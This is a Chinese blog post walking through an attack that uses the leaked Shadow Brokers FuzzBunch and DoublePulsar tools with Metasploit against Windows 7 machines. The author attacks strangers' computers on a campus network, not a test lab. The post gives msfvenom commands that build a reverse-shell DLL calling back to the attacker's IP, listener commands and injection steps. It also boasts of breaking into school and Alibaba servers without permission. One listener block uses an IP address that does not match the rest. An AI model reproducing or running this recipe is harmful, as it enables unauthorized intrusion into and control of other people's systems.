引言
前几天影子经纪人Shadow Brokers黑了方程式黑客组织(网上是这么说的),然后放出了一堆牛逼的工具,这好像向互联网世界投放了一枚核弹,这一堆工具可以主要用来攻击windows系统,主要针对windows xp/7/2008 操作系统,然而现在很多服务仍然使用的是windows系统,这将导致全世界的70%服务器暴露在危险之中,工具发布出来的那一刻,整个互联网都炸了锅,自从之前臭名昭著的MS08-067漏洞之后,这次的漏洞是最大的一个,并且绝不亚于MS08-067,我前几天亲自测试了window server2008和windows7,大部分的机器都是一打一个准,几分钟就能拿到服务器的管理员权限。
再说一下windows7,它几乎是不用来做服务器的,一般都是个人电脑,虽然windows 8和10都已经出来了,但是我个人认为i,win7比后面这两个版本要好用,但不巧,这一堆工具发出来之后,几乎所有的win7都可以轻松被入侵,别人可以轻而易举的监视你的一举一动。
测试环境
攻击机1:windows 7 IP:10.216.50.193
攻击机2:Kali (Ubuntu系统) IP:10.217.101.17
被攻击者:内网的某台windows7(校园网内网可ping通)
攻击工具
Metasploit (用来生成dll和控制被攻击者)
FB (用来攻击被攻击者漏洞)
LanHelper (扫描内网主机)
开启渗透之旅
1、扫描IP 找到入侵对象
我么首先在我们使用LanHelper在所在的网段扫描一批机器出来
如上图,我们已经扫描完一批内网机器,这里要注意一下我们要拿来测试的是win7系统的机器,一般win7系统扫完之后在后面都有WORKGROUP的标志,我们就拿上面的10.216.42.7这个ip下手吧。
被攻击者IP:10.216.42.7
2、和使用fb工具进行攻击测试
我们首先在fb.py目录下么新建一个listeningposts文件夹,如果没有它工具会报错。还有这个工具需要电脑居右python2.6和pywin32环境,否则是无法运行的。
打开fb.py,然后进行一系列的配置,填上被攻击者ip和本机ip,在询问是否重定向的地方输入no,因为我们不需要。
然后一直回车,一直到提示选择操作系统的地方,然后选择1,回车后选择fb,也就是1
回车之后就开始进行攻击了,如果成功了就会出现以下界面
3、使用Metasploit生成dll后门文件并监听连接
我们首先在kali上面ping一下被攻击者确定可以连接到。。。。我嘞个去,那家伙关机了,ping不通了,我换一个ip:10.216.29.127,上面的操作步骤换下ip就好
被攻击者ip:10.216.29.127
ok,这次可以ping通了。我们在kali的终端使用命令生成一个dll后门文件,命令如下
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.217.101.17 LPORT=5555 -f dll > /opt/my.dll
上面的LHOST=后面填你的kali的ip,LPORT=是我们要监听的端口,生成的文件放在了 /opt/下面。
然后将生成的文件拿到window7攻击机的c盘下面,然后启动kali的Metasploit,启动命令是msfconsole,然后一次执行下面的命令
1 2 3 4 5 |
use exploit/multi/handler set lhost 10.217.101.17 set lport 5555 set PAYLOAD windows/x64/meterpreter/reverse_tcp exploit |
这样就开始监听5555端口,等待被攻击者的连接。下面继续使用win7攻击机,将刚才生成的dll注入到被攻击者。
4、使用fb的Doublepulsar注入dll
在fb中继续输入命令 use Doublepulsar 然后一直回车知道选择攻击类型和选择目标机位数,选择SMB和x64,如下
然后回车再选择2,注入dll文件,输入刚才的dll文件路径c:\my.dll。
当看到上面的Succeeded的提示的时候,说明已经注入成功了,这时候可以去kali端查看连接情况了。
5、kali攻击机控制被攻击者
看kali端的l连接情况
从上面可以看到,被攻击者主动连接了攻击机,此时的kaili攻击机就拿到了控制被攻击者的权限。具体的执行命令这里就不说了,因为我们入侵的是windows7,这里其实已经是管理员权限了,不用再继续提权了。
6、补充
上面的生成的dll文件是64位的,所以在攻击32位的机器的时候是会注入失败的,不过不要紧,只要取消生成命令的时候的x64就可以了,这时候在监听端口的时候也需要监听32位的反弹连接,同样在设置pyload的时候去掉x64就可以了。命令如下
1 |
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.217.101.17 LPORT=5555 -f dll > /opt/s.dll |
1 2 3 4 5 |
use exploit/multi/handler set lhost 192.168.1.106 set lport 5555 set PAYLOAD windows/meterpreter/reverse_tcp exploit |
结束语
经过我的多次测试,学校的一些windows2008服务器也存在这种漏洞,并且和容易被渗透进去,阿里的服务器也是,扫了一段2008出来,测试也成功拿到管理员权限,所以说,这款工具简直就是windows的克星、好在微软的补丁已经出来了,使用windows7和2008,2003的小伙伴们赶紧打补丁吧。